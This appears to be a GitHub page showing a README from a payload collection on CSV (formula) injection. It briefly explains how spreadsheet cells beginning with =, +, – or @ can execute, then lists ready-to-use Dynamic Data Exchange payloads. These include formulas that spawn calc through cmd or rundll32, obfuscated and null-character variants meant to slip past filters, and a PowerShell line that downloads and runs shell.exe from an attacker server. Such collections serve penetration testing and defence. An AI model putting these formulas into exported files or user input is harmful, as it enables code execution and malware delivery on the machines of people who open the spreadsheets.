Skip to content

Latest commit

 

History

History
 
 

CSV Injection

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 

README.md

CSV Injection

Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.

Summary

Methodology

CSV Injection, also known as Formula Injection, is a security vulnerability that occurs when untrusted input is included in a CSV file. Any formula can be started with:

=
+
–
@

Basic exploits with Dynamic Data Exchange.

  • Spawn a calc

    DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'

  • PowerShell download and execute

    =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

  • Prefix obfuscation and command chaining

    =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A

  • Using rundll32 instead of cmd

    =rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

  • Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.

    =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A

Technical details of the above payloads:

  • cmd is the name the server can respond to whenever a client is trying to access the server
  • /C calc is the file name which in our case is the calc(i.e the calc.exe)
  • !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data

References